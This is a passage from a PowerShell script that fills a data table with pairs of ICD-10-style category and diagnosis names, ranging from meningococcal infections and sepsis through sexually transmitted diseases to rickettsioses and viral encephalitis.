infection","Meningococcemia, unspecified") + $null = $DiagnosisList.Rows.Add("Meningococcal heart disease","Meningococcal carditis, unspecified") + $null = $DiagnosisList.Rows.Add("Meningococcal heart disease","Meningococcal endocarditis") + $null = $DiagnosisList.Rows.Add("Meningococcal heart disease","Meningococcal myocarditis") + $null = $DiagnosisList.Rows.Add("Meningococcal heart disease","Meningococcal pericarditis") + $null = $DiagnosisList.Rows.Add("Other meningococcal infections","Meningococcal encephalitis") + $null = $DiagnosisList.Rows.Add("Other meningococcal infections","Meningococcal retrobulbar neuritis") + $null = $DiagnosisList.Rows.Add("Other meningococcal infections","Meningococcal arthritis") + $null = $DiagnosisList.Rows.Add("Other meningococcal infections","Postmeningococcal arthritis") + $null = $DiagnosisList.Rows.Add("Other meningococcal infections","Other meningococcal infections") + $null = $DiagnosisList.Rows.Add("Meningococcal infection, unspecified","Meningococcal infection, unspecified") + $null = $DiagnosisList.Rows.Add("Streptococcal sepsis","Sepsis due to streptococcus, group A") + $null = $DiagnosisList.Rows.Add("Streptococcal sepsis","Sepsis due to streptococcus, group B") + $null = $DiagnosisList.Rows.Add("Streptococcal sepsis","Sepsis due to Streptococcus pneumoniae") + $null = $DiagnosisList.Rows.Add("Streptococcal sepsis","Other streptococcal sepsis") + $null = $DiagnosisList.Rows.Add("Streptococcal sepsis","Streptococcal sepsis, unspecified") + $null = $DiagnosisList.Rows.Add("Sepsis due to Staphylococcus aureus","Sepsis due to Methicillin susceptible Staphylococcus aureus") + $null = $DiagnosisList.Rows.Add("Sepsis due to Staphylococcus aureus","Sepsis due to Methicillin resistant Staphylococcus aureus") + $null = $DiagnosisList.Rows.Add("Sepsis due to other specified staphylococcus","Sepsis due to other specified staphylococcus") + $null = $DiagnosisList.Rows.Add("Sepsis due to unspecified staphylococcus","Sepsis due to unspecified staphylococcus") + $null = $DiagnosisList.Rows.Add("Sepsis due to Hemophilus influenzae","Sepsis due to Hemophilus influenzae") + $null = $DiagnosisList.Rows.Add("Sepsis due to anaerobes","Sepsis due to anaerobes") + $null = $DiagnosisList.Rows.Add("Sepsis due to other Gram-negative organisms","Gram-negative sepsis, unspecified") + $null = $DiagnosisList.Rows.Add("Sepsis due to other Gram-negative organisms","Sepsis due to Escherichia coli [E. coli]") + $null = $DiagnosisList.Rows.Add("Sepsis due to other Gram-negative organisms","Sepsis due to Pseudomonas") + $null = $DiagnosisList.Rows.Add("Sepsis due to other Gram-negative organisms","Sepsis due to Serratia") + $null = $DiagnosisList.Rows.Add("Sepsis due to other Gram-negative organisms","Other Gram-negative sepsis") + $null = $DiagnosisList.Rows.Add("Other specified sepsis","Sepsis due to Enterococcus") + $null = $DiagnosisList.Rows.Add("Other specified sepsis","Other specified sepsis") + $null = $DiagnosisList.Rows.Add("Sepsis, unspecified organism","Sepsis, unspecified organism") + $null = $DiagnosisList.Rows.Add("Actinomycosis","Pulmonary actinomycosis") + $null = $DiagnosisList.Rows.Add("Actinomycosis","Abdominal actinomycosis") + $null = $DiagnosisList.Rows.Add("Actinomycosis","Cervicofacial actinomycosis") + $null = $DiagnosisList.Rows.Add("Actinomycosis","Actinomycotic sepsis") + $null = $DiagnosisList.Rows.Add("Other forms of actinomycosis","Actinomycotic meningitis") + $null = $DiagnosisList.Rows.Add("Other forms of actinomycosis","Actinomycotic encephalitis") + $null = $DiagnosisList.Rows.Add("Other forms of actinomycosis","Other forms of actinomycosis") + $null = $DiagnosisList.Rows.Add("Actinomycosis, unspecified","Actinomycosis, unspecified") + $null = $DiagnosisList.Rows.Add("Nocardiosis","Pulmonary nocardiosis") + $null = $DiagnosisList.Rows.Add("Nocardiosis","Cutaneous nocardiosis") + $null = $DiagnosisList.Rows.Add("Nocardiosis","Other forms of nocardiosis") + $null = $DiagnosisList.Rows.Add("Nocardiosis","Nocardiosis, unspecified") + $null = $DiagnosisList.Rows.Add("Bartonellosis","Systemic bartonellosis") + $null = $DiagnosisList.Rows.Add("Bartonellosis","Cutaneous and mucocutaneous bartonellosis") + $null = $DiagnosisList.Rows.Add("Bartonellosis","Other forms of bartonellosis") + $null = $DiagnosisList.Rows.Add("Bartonellosis","Bartonellosis, unspecified") + $null = $DiagnosisList.Rows.Add("Erysipelas","Erysipelas") + $null = $DiagnosisList.Rows.Add("Other bacterial diseases, not elsewhere classified","Gas gangrene") + $null = $DiagnosisList.Rows.Add("Other bacterial diseases, not elsewhere classified","Legionnaires' disease") + $null = $DiagnosisList.Rows.Add("Other bacterial diseases, not elsewhere classified","Nonpneumonic Legionnaires' disease [Pontiac fever]") + $null = $DiagnosisList.Rows.Add("Other bacterial diseases, not elsewhere classified","Toxic shock syndrome") + $null = $DiagnosisList.Rows.Add("Other bacterial diseases, not elsewhere classified","Brazilian purpuric fever") + $null = $DiagnosisList.Rows.Add("Other specified botulism","Infant botulism") + $null = $DiagnosisList.Rows.Add("Other specified botulism","Wound botulism") + $null = $DiagnosisList.Rows.Add("Other specified bacterial diseases","Other specified bacterial diseases") + $null = $DiagnosisList.Rows.Add("Staphylococcal infection, unspecified site","Methicillin susceptible Staphylococcus aureus infection, unspecified site") + $null = $DiagnosisList.Rows.Add("Staphylococcal infection, unspecified site","Methicillin resistant Staphylococcus aureus infection, unspecified site") + $null = $DiagnosisList.Rows.Add("Streptococcal infection, unspecified site","Streptococcal infection, unspecified site") + $null = $DiagnosisList.Rows.Add("Hemophilus influenzae infection, unspecified site","Hemophilus influenzae infection, unspecified site") + $null = $DiagnosisList.Rows.Add("Mycoplasma infection, unspecified site","Mycoplasma infection, unspecified site") + $null = $DiagnosisList.Rows.Add("Other bacterial infections of unspecified site","Other bacterial infections of unspecified site") + $null = $DiagnosisList.Rows.Add("Bacterial infection, unspecified","Bacterial infection, unspecified") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Early congenital syphilitic oculopathy") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Early congenital syphilitic osteochondropathy") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Early congenital syphilitic pharyngitis") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Early congenital syphilitic pneumonia") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Early congenital syphilitic rhinitis") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Early cutaneous congenital syphilis") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Early mucocutaneous congenital syphilis") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Early visceral congenital syphilis") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, symptomatic","Other early congenital syphilis, symptomatic") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, latent","Early congenital syphilis, latent") + $null = $DiagnosisList.Rows.Add("Early congenital syphilis, unspecified","Early congenital syphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Late congenital syphilitic oculopathy","Late congenital syphilitic oculopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Late congenital syphilitic oculopathy","Late congenital syphilitic interstitial keratitis") + $null = $DiagnosisList.Rows.Add("Late congenital syphilitic oculopathy","Late congenital syphilitic chorioretinitis") + $null = $DiagnosisList.Rows.Add("Late congenital syphilitic oculopathy","Other late congenital syphilitic oculopathy") + $null = $DiagnosisList.Rows.Add("Late congenital neurosyphilis [juvenile neurosyphilis]","Late congenital neurosyphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Late congenital neurosyphilis [juvenile neurosyphilis]","Late congenital syphilitic meningitis") + $null = $DiagnosisList.Rows.Add("Late congenital neurosyphilis [juvenile neurosyphilis]","Late congenital syphilitic encephalitis") + $null = $DiagnosisList.Rows.Add("Late congenital neurosyphilis [juvenile neurosyphilis]","Late congenital syphilitic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Late congenital neurosyphilis [juvenile neurosyphilis]","Late congenital syphilitic optic nerve atrophy") + $null = $DiagnosisList.Rows.Add("Late congenital neurosyphilis [juvenile neurosyphilis]","Juvenile general paresis") + $null = $DiagnosisList.Rows.Add("Late congenital neurosyphilis [juvenile neurosyphilis]","Other late congenital neurosyphilis") + $null = $DiagnosisList.Rows.Add("Other late congenital syphilis, symptomatic","Clutton's joints") + $null = $DiagnosisList.Rows.Add("Other late congenital syphilis, symptomatic","Hutchinson's teeth") + $null = $DiagnosisList.Rows.Add("Other late congenital syphilis, symptomatic","Hutchinson's triad") + $null = $DiagnosisList.Rows.Add("Other late congenital syphilis, symptomatic","Late congenital cardiovascular syphilis") + $null = $DiagnosisList.Rows.Add("Other late congenital syphilis, symptomatic","Late congenital syphilitic arthropathy") + $null = $DiagnosisList.Rows.Add("Other late congenital syphilis, symptomatic","Late congenital syphilitic osteochondropathy") + $null = $DiagnosisList.Rows.Add("Other late congenital syphilis, symptomatic","Syphilitic saddle nose") + $null = $DiagnosisList.Rows.Add("Other late congenital syphilis, symptomatic","Other late congenital syphilis, symptomatic") + $null = $DiagnosisList.Rows.Add("Late congenital syphilis, latent","Late congenital syphilis, latent") + $null = $DiagnosisList.Rows.Add("Late congenital syphilis, unspecified","Late congenital syphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital syphilis, unspecified","Congenital syphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Early syphilis","Primary genital syphilis") + $null = $DiagnosisList.Rows.Add("Early syphilis","Primary anal syphilis") + $null = $DiagnosisList.Rows.Add("Early syphilis","Primary syphilis of other sites") + $null = $DiagnosisList.Rows.Add("Secondary syphilis of skin and mucous membranes","Condyloma latum") + $null = $DiagnosisList.Rows.Add("Secondary syphilis of skin and mucous membranes","Syphilitic alopecia") + $null = $DiagnosisList.Rows.Add("Secondary syphilis of skin and mucous membranes","Other secondary syphilis of skin") + $null = $DiagnosisList.Rows.Add("Other secondary syphilis","Secondary syphilitic meningitis") + $null = $DiagnosisList.Rows.Add("Other secondary syphilis","Secondary syphilitic female pelvic disease") + $null = $DiagnosisList.Rows.Add("Other secondary syphilis","Secondary syphilitic oculopathy") + $null = $DiagnosisList.Rows.Add("Other secondary syphilis","Secondary syphilitic nephritis") + $null = $DiagnosisList.Rows.Add("Other secondary syphilis","Secondary syphilitic hepatitis") + $null = $DiagnosisList.Rows.Add("Other secondary syphilis","Secondary syphilitic osteopathy") + $null = $DiagnosisList.Rows.Add("Other secondary syphilis","Other secondary syphilitic conditions") + $null = $DiagnosisList.Rows.Add("Early syphilis, latent","Early syphilis, latent") + $null = $DiagnosisList.Rows.Add("Early syphilis, unspecified","Early syphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Cardiovascular and cerebrovascular syphilis","Cardiovascular syphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Cardiovascular and cerebrovascular syphilis","Syphilitic aneurysm of aorta") + $null = $DiagnosisList.Rows.Add("Cardiovascular and cerebrovascular syphilis","Syphilitic aortitis") + $null = $DiagnosisList.Rows.Add("Cardiovascular and cerebrovascular syphilis","Syphilitic endocarditis") + $null = $DiagnosisList.Rows.Add("Cardiovascular and cerebrovascular syphilis","Syphilitic cerebral arteritis") + $null = $DiagnosisList.Rows.Add("Cardiovascular and cerebrovascular syphilis","Other cerebrovascular syphilis") + $null = $DiagnosisList.Rows.Add("Cardiovascular and cerebrovascular syphilis","Other syphilitic heart involvement") + $null = $DiagnosisList.Rows.Add("Cardiovascular and cerebrovascular syphilis","Other cardiovascular syphilis") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","Symptomatic neurosyphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","Tabes dorsalis") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","Other cerebrospinal syphilis") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","Late syphilitic meningitis") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","Late syphilitic encephalitis") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","Late syphilitic neuropathy") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","Charcot's arthropathy (tabetic)") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","General paresis") + $null = $DiagnosisList.Rows.Add("Symptomatic neurosyphilis","Other symptomatic neurosyphilis") + $null = $DiagnosisList.Rows.Add("Asymptomatic neurosyphilis","Asymptomatic neurosyphilis") + $null = $DiagnosisList.Rows.Add("Neurosyphilis, unspecified","Neurosyphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Late syphilitic oculopathy") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Syphilis of lung and bronchus") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Symptomatic late syphilis of other respiratory organs") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Syphilis of liver and other viscera") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Syphilis of kidney and ureter") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Other genitourinary symptomatic late syphilis") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Syphilis of bone and joint") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Syphilis of other musculoskeletal tissue") + $null = $DiagnosisList.Rows.Add("Other symptomatic late syphilis","Other symptomatic late syphilis") + $null = $DiagnosisList.Rows.Add("Late syphilis, latent","Late syphilis, latent") + $null = $DiagnosisList.Rows.Add("Late syphilis, unspecified","Late syphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified syphilis","Latent syphilis, unspecified as early or late") + $null = $DiagnosisList.Rows.Add("Other and unspecified syphilis","Syphilis, unspecified") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of lower genitourinary tract without periurethral or accessory gland abscess","Gonococcal infection of lower genitourinary tract, unspecified") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of lower genitourinary tract without periurethral or accessory gland abscess","Gonococcal cystitis and urethritis, unspecified") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of lower genitourinary tract without periurethral or accessory gland abscess","Gonococcal vulvovaginitis, unspecified") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of lower genitourinary tract without periurethral or accessory gland abscess","Gonococcal cervicitis, unspecified") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of lower genitourinary tract without periurethral or accessory gland abscess","Other gonococcal infection of lower genitourinary tract") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of lower genitourinary tract with periurethral and accessory gland abscess","Gonococcal infection of lower genitourinary tract with periurethral and accessory gland abscess") + $null = $DiagnosisList.Rows.Add("Gonococcal pelviperitonitis and other gonococcal genitourinary infection","Gonococcal infection of kidney and ureter") + $null = $DiagnosisList.Rows.Add("Gonococcal pelviperitonitis and other gonococcal genitourinary infection","Gonococcal prostatitis") + $null = $DiagnosisList.Rows.Add("Gonococcal pelviperitonitis and other gonococcal genitourinary infection","Gonococcal infection of other male genital organs") + $null = $DiagnosisList.Rows.Add("Gonococcal pelviperitonitis and other gonococcal genitourinary infection","Gonococcal female pelvic inflammatory disease") + $null = $DiagnosisList.Rows.Add("Gonococcal pelviperitonitis and other gonococcal genitourinary infection","Other gonococcal genitourinary infections") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of eye","Gonococcal infection of eye, unspecified") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of eye","Gonococcal conjunctivitis") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of eye","Gonococcal iridocyclitis") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of eye","Gonococcal keratitis") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of eye","Other gonococcal eye infection") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of musculoskeletal system","Gonococcal infection of musculoskeletal system, unspecified") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of musculoskeletal system","Gonococcal spondylopathy") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of musculoskeletal system","Gonococcal arthritis") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of musculoskeletal system","Gonococcal osteomyelitis") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of musculoskeletal system","Gonococcal infection of other musculoskeletal tissue") + $null = $DiagnosisList.Rows.Add("Gonococcal pharyngitis","Gonococcal pharyngitis") + $null = $DiagnosisList.Rows.Add("Gonococcal infection of anus and rectum","Gonococcal infection of anus and rectum") + $null = $DiagnosisList.Rows.Add("Other gonococcal infections","Gonococcal meningitis") + $null = $DiagnosisList.Rows.Add("Other gonococcal infections","Gonococcal brain abscess") + $null = $DiagnosisList.Rows.Add("Other gonococcal infections","Gonococcal heart infection") + $null = $DiagnosisList.Rows.Add("Other gonococcal infections","Gonococcal pneumonia") + $null = $DiagnosisList.Rows.Add("Other gonococcal infections","Gonococcal peritonitis") + $null = $DiagnosisList.Rows.Add("Other gonococcal infections","Gonococcal sepsis") + $null = $DiagnosisList.Rows.Add("Other gonococcal infections","Other gonococcal infections") + $null = $DiagnosisList.Rows.Add("Gonococcal infection, unspecified","Gonococcal infection, unspecified") + $null = $DiagnosisList.Rows.Add("Chlamydial lymphogranuloma (venereum)","Chlamydial lymphogranuloma (venereum)") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of lower genitourinary tract","Chlamydial infection of lower genitourinary tract, unspecified") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of lower genitourinary tract","Chlamydial cystitis and urethritis") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of lower genitourinary tract","Chlamydial vulvovaginitis") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of lower genitourinary tract","Other chlamydial infection of lower genitourinary tract") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of pelviperitoneum and other genitourinary organs","Chlamydial female pelvic inflammatory disease") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of pelviperitoneum and other genitourinary organs","Other chlamydial genitourinary infection") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of genitourinary tract, unspecified","Chlamydial infection of genitourinary tract, unspecified") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of anus and rectum","Chlamydial infection of anus and rectum") + $null = $DiagnosisList.Rows.Add("Chlamydial infection of pharynx","Chlamydial infection of pharynx") + $null = $DiagnosisList.Rows.Add("Sexually transmitted chlamydial infection of other sites","Sexually transmitted chlamydial infection of other sites") + $null = $DiagnosisList.Rows.Add("Chancroid","Chancroid") + $null = $DiagnosisList.Rows.Add("Granuloma inguinale","Granuloma inguinale") + $null = $DiagnosisList.Rows.Add("Urogenital trichomoniasis","Urogenital trichomoniasis, unspecified") + $null = $DiagnosisList.Rows.Add("Urogenital trichomoniasis","Trichomonal vulvovaginitis") + $null = $DiagnosisList.Rows.Add("Urogenital trichomoniasis","Trichomonal prostatitis") + $null = $DiagnosisList.Rows.Add("Urogenital trichomoniasis","Trichomonal cystitis and urethritis") + $null = $DiagnosisList.Rows.Add("Urogenital trichomoniasis","Other urogenital trichomoniasis") + $null = $DiagnosisList.Rows.Add("Trichomoniasis of other sites","Trichomoniasis of other sites") + $null = $DiagnosisList.Rows.Add("Trichomoniasis, unspecified","Trichomoniasis, unspecified") + $null = $DiagnosisList.Rows.Add("Herpesviral infection of genitalia and urogenital tract","Herpesviral infection of urogenital system, unspecified") + $null = $DiagnosisList.Rows.Add("Herpesviral infection of genitalia and urogenital tract","Herpesviral infection of penis") + $null = $DiagnosisList.Rows.Add("Herpesviral infection of genitalia and urogenital tract","Herpesviral infection of other male genital organs") + $null = $DiagnosisList.Rows.Add("Herpesviral infection of genitalia and urogenital tract","Herpesviral cervicitis") + $null = $DiagnosisList.Rows.Add("Herpesviral infection of genitalia and urogenital tract","Herpesviral vulvovaginitis") + $null = $DiagnosisList.Rows.Add("Herpesviral infection of genitalia and urogenital tract","Herpesviral infection of other urogenital tract") + $null = $DiagnosisList.Rows.Add("Herpesviral infection of perianal skin and rectum","Herpesviral infection of perianal skin and rectum") + $null = $DiagnosisList.Rows.Add("Anogenital herpesviral infection, unspecified","Anogenital herpesviral infection, unspecified") + $null = $DiagnosisList.Rows.Add("Other predominantly sexually transmitted diseases, not elsewhere classified","Anogenital (venereal) warts") + $null = $DiagnosisList.Rows.Add("Other predominantly sexually transmitted diseases, not elsewhere classified","Other specified predominantly sexually transmitted diseases") + $null = $DiagnosisList.Rows.Add("Unspecified sexually transmitted disease","Unspecified sexually transmitted disease") + $null = $DiagnosisList.Rows.Add("Nonvenereal syphilis","Nonvenereal syphilis") + $null = $DiagnosisList.Rows.Add("Yaws","Initial lesions of yaws") + $null = $DiagnosisList.Rows.Add("Yaws","Multiple papillomata and wet crab yaws") + $null = $DiagnosisList.Rows.Add("Yaws","Other early skin lesions of yaws") + $null = $DiagnosisList.Rows.Add("Yaws","Hyperkeratosis of yaws") + $null = $DiagnosisList.Rows.Add("Yaws","Gummata and ulcers of yaws") + $null = $DiagnosisList.Rows.Add("Yaws","Gangosa") + $null = $DiagnosisList.Rows.Add("Yaws","Bone and joint lesions of yaws") + $null = $DiagnosisList.Rows.Add("Yaws","Other manifestations of yaws") + $null = $DiagnosisList.Rows.Add("Yaws","Latent yaws") + $null = $DiagnosisList.Rows.Add("Yaws","Yaws, unspecified") + $null = $DiagnosisList.Rows.Add("Pinta [carate]","Primary lesions of pinta") + $null = $DiagnosisList.Rows.Add("Pinta [carate]","Intermediate lesions of pinta") + $null = $DiagnosisList.Rows.Add("Pinta [carate]","Late lesions of pinta") + $null = $DiagnosisList.Rows.Add("Pinta [carate]","Mixed lesions of pinta") + $null = $DiagnosisList.Rows.Add("Pinta [carate]","Pinta, unspecified") + $null = $DiagnosisList.Rows.Add("Relapsing fevers","Louse-borne relapsing fever") + $null = $DiagnosisList.Rows.Add("Relapsing fevers","Tick-borne relapsing fever") + $null = $DiagnosisList.Rows.Add("Relapsing fevers","Relapsing fever, unspecified") + $null = $DiagnosisList.Rows.Add("Other spirochetal infections","Necrotizing ulcerative stomatitis") + $null = $DiagnosisList.Rows.Add("Other spirochetal infections","Other Vincent's infections") + $null = $DiagnosisList.Rows.Add("Lyme disease","Lyme disease, unspecified") + $null = $DiagnosisList.Rows.Add("Lyme disease","Meningitis due to Lyme disease") + $null = $DiagnosisList.Rows.Add("Lyme disease","Other neurologic disorders in Lyme disease") + $null = $DiagnosisList.Rows.Add("Lyme disease","Arthritis due to Lyme disease") + $null = $DiagnosisList.Rows.Add("Lyme disease","Other conditions associated with Lyme disease") + $null = $DiagnosisList.Rows.Add("Other specified spirochetal infections","Other specified spirochetal infections") + $null = $DiagnosisList.Rows.Add("Spirochetal infection, unspecified","Spirochetal infection, unspecified") + $null = $DiagnosisList.Rows.Add("Chlamydia psittaci infections","Chlamydia psittaci infections") + $null = $DiagnosisList.Rows.Add("Trachoma","Initial stage of trachoma") + $null = $DiagnosisList.Rows.Add("Trachoma","Active stage of trachoma") + $null = $DiagnosisList.Rows.Add("Trachoma","Trachoma, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases caused by chlamydiae","Chlamydial conjunctivitis") + $null = $DiagnosisList.Rows.Add("Other chlamydial diseases","Chlamydial peritonitis") + $null = $DiagnosisList.Rows.Add("Other chlamydial diseases","Other chlamydial diseases") + $null = $DiagnosisList.Rows.Add("Chlamydial infection, unspecified","Chlamydial infection, unspecified") + $null = $DiagnosisList.Rows.Add("Typhus fever","Epidemic louse-borne typhus fever due to Rickettsia prowazekii") + $null = $DiagnosisList.Rows.Add("Typhus fever","Recrudescent typhus [Brill's disease]") + $null = $DiagnosisList.Rows.Add("Typhus fever","Typhus fever due to Rickettsia typhi") + $null = $DiagnosisList.Rows.Add("Typhus fever","Typhus fever due to Rickettsia tsutsugamushi") + $null = $DiagnosisList.Rows.Add("Typhus fever","Typhus fever, unspecified") + $null = $DiagnosisList.Rows.Add("Spotted fever [tick-borne rickettsioses]","Spotted fever due to Rickettsia rickettsii") + $null = $DiagnosisList.Rows.Add("Spotted fever [tick-borne rickettsioses]","Spotted fever due to Rickettsia conorii") + $null = $DiagnosisList.Rows.Add("Spotted fever [tick-borne rickettsioses]","Spotted fever due to Rickettsia siberica") + $null = $DiagnosisList.Rows.Add("Spotted fever [tick-borne rickettsioses]","Spotted fever due to Rickettsia australis") + $null = $DiagnosisList.Rows.Add("Ehrlichiosis","Ehrlichiosis, unspecified") + $null = $DiagnosisList.Rows.Add("Ehrlichiosis","Ehrlichiosis chafeensis [E. chafeensis]") + $null = $DiagnosisList.Rows.Add("Ehrlichiosis","Other ehrlichiosis") + $null = $DiagnosisList.Rows.Add("Other spotted fevers","Other spotted fevers") + $null = $DiagnosisList.Rows.Add("Spotted fever, unspecified","Spotted fever, unspecified") + $null = $DiagnosisList.Rows.Add("Q fever","Q fever") + $null = $DiagnosisList.Rows.Add("Other rickettsioses","Trench fever") + $null = $DiagnosisList.Rows.Add("Other rickettsioses","Rickettsialpox due to Rickettsia akari") + $null = $DiagnosisList.Rows.Add("Other specified rickettsioses","Rickettsiosis due to Ehrlichia sennetsu") + $null = $DiagnosisList.Rows.Add("Other specified rickettsioses","Other specified rickettsioses") + $null = $DiagnosisList.Rows.Add("Rickettsiosis, unspecified","Rickettsiosis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute poliomyelitis","Acute paralytic poliomyelitis, vaccine-associated") + $null = $DiagnosisList.Rows.Add("Acute poliomyelitis","Acute paralytic poliomyelitis, wild virus, imported") + $null = $DiagnosisList.Rows.Add("Acute poliomyelitis","Acute paralytic poliomyelitis, wild virus, indigenous") + $null = $DiagnosisList.Rows.Add("Acute paralytic poliomyelitis, other and unspecified","Acute paralytic poliomyelitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute paralytic poliomyelitis, other and unspecified","Other acute paralytic poliomyelitis") + $null = $DiagnosisList.Rows.Add("Acute nonparalytic poliomyelitis","Acute nonparalytic poliomyelitis") + $null = $DiagnosisList.Rows.Add("Acute poliomyelitis, unspecified","Acute poliomyelitis, unspecified") + $null = $DiagnosisList.Rows.Add("Creutzfeldt-Jakob disease","Creutzfeldt-Jakob disease, unspecified") + $null = $DiagnosisList.Rows.Add("Creutzfeldt-Jakob disease","Variant Creutzfeldt-Jakob disease") + $null = $DiagnosisList.Rows.Add("Creutzfeldt-Jakob disease","Other Creutzfeldt-Jakob disease") + $null = $DiagnosisList.Rows.Add("Subacute sclerosing panencephalitis","Subacute sclerosing panencephalitis") + $null = $DiagnosisList.Rows.Add("Progressive multifocal leukoencephalopathy","Progressive multifocal leukoencephalopathy") + $null = $DiagnosisList.Rows.Add("Other atypical virus infections of central nervous system","Kuru") + $null = $DiagnosisList.Rows.Add("Other atypical virus infections of central nervous system","Gerstmann-Straussler-Scheinker syndrome") + $null = $DiagnosisList.Rows.Add("Other atypical virus infections of central nervous system","Fatal familial insomnia") + $null = $DiagnosisList.Rows.Add("Other atypical virus infections of central nervous system","Other atypical virus infections of central nervous system") + $null = $DiagnosisList.Rows.Add("Atypical virus infection of central nervous system, unspecified","Atypical virus infection of central nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Rabies","Sylvatic rabies") + $null = $DiagnosisList.Rows.Add("Rabies","Urban rabies") + $null = $DiagnosisList.Rows.Add("Rabies","Rabies, unspecified") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","Japanese encephalitis") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","Western equine encephalitis") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","Eastern equine encephalitis") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","St Louis encephalitis") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","Australian encephalitis") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","California encephalitis") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","Rocio virus disease") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","Other mosquito-borne viral encephalitis") + $null = $DiagnosisList.Rows.Add("Mosquito-borne viral encephalitis","Mosquito-borne viral encephalitis, unspecified") + $null = $DiagnosisList.Rows.Add("Tick-borne viral encephalitis","Far Eastern tick-borne encephalitis [Russian spring-summer encephalitis]") + $null = $DiagnosisList.Rows.Add("Tick-borne viral encephalitis","Central European tick-borne encephalitis") + $null = $DiagnosisList.Rows.Add("Tick-borne viral encephalitis","Other tick-borne viral encephalitis") + $null = $DiagnosisList.Rows.Add("Tick-borne viral encephalitis","Tick-borne viral encephalitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other viral encephalitis, not elsewhere classified","Enteroviral encephalitis") + $null = $DiagnosisList.Rows.Add("Other viral encephalitis, not elsewhere classified","Adenoviral encephalitis") + $null = $DiagnosisList.Rows.Add("Other viral encephalitis, not elsewhere classified","Arthropod-borne viral encephalitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other viral encephalitis, not elsewhere classified","Other specified viral encephalitis") + $null = $DiagnosisList.Rows.Add("Unspecified viral encephalitis","Unspecified viral encephalitis") + $null = $DiagnosisList.Rows.Add("Viral meningitis","Enteroviral meningitis") + $null = $DiagnosisList.Rows.Add("Viral meningitis","Adenoviral meningitis") + $null = $DiagnosisList.Rows.Add("Viral meningitis","Lymphocytic choriomeningitis") + $null = $DiagnosisList.Rows.Add("Viral meningitis","Other viral meningitis") + $null = $DiagnosisList.Rows.Add("Viral meningitis","Viral meningitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other viral infections of central nervous system, not elsewhere classified","Enteroviral exanthematous fever [Boston exanthem]") + $null = $DiagnosisList.Rows.Add("Other viral infections of central nervous system, not elsewhere classified","Epidemic vertigo") + $null = $DiagnosisList.Rows.Add("Other viral infections of central nervous system, not elsewhere classified","Other specified viral infections of central nervous system") + $null = $DiagnosisList.Rows.Add("Unspecified 